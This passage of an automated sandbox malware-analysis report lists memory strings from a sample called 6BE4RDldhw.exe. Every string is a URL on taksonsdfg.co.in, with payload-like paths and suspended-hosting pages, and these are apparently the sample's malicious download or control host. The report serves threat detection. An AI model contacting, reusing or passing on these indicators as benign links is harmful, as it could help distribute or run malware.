Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in
Source: 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2433890987.0000000000939000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/
Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/)r
Source: 6BE4RDldhw.exe, 00000000.00000003.1394882795.00000000008D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/05
Source: 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/1r
Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FABF000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FACD000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/234567876543212
Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/2345678765432121$
Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.000000000090C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza
Source: 6BE4RDldhw.exe, 00000000.00000003.1519974580.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza#
Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000909000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza$
Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza7
Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza8
Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzaaq
Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzak
Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.000000000090B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzakb
Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FABF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/234567876543212P
Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/234567876543212a
Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/4
Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/9r6k
Source: 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/Ar
Source: 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/H
Source: 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/Ir
Source: 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/Qr
Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/Qu
Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/Yr
Source: 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/ar
Source: 6BE4RDldhw.exe, 00000000.00000003.2345346508.00000000008DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-s
Source: 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000091C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345831810.0000000000919000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.000000000090C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.000000000091A000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi$
Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi)r
Source: 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi4
Source: 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.000000000090C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.000000000090C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.000000000090B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza
Source: 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.000000000090B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza-bRk
Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaCb
Source: 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.000000000090B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaIb
Source: 6BE4RDldhw.exe, 00000000.00000003.2475345569.000000000090B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaWb
Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.000000000090B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzakb
Source: 6BE4RDldhw.exe, 00000000.00000003.1690257877.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.000000000090B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzaqb
Source: 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000909000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R
Source: 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas
Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiU3
Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgig3ok
Source: 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgim
Source: 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiqr
Source: 6BE4RDldhw.exe, 00000000.00000003.1394882795.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/iu
Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/yr
Source: 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza
Source: 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza0u
Source: 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_YjnxmyasmzaX
Source: 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000091C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi
Source: 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi$
Source: 6BE4RDldhw.exe, 00000000.00000003.1519974580.00000000008CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi1Content-LengthAllowWarningViaUpgradeTransfer-
Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza
Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza0u
Source: 6BE4RDldhw.exe, 00000000.00000003.1914742318.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi8
Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi:
Source: 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiDASYC
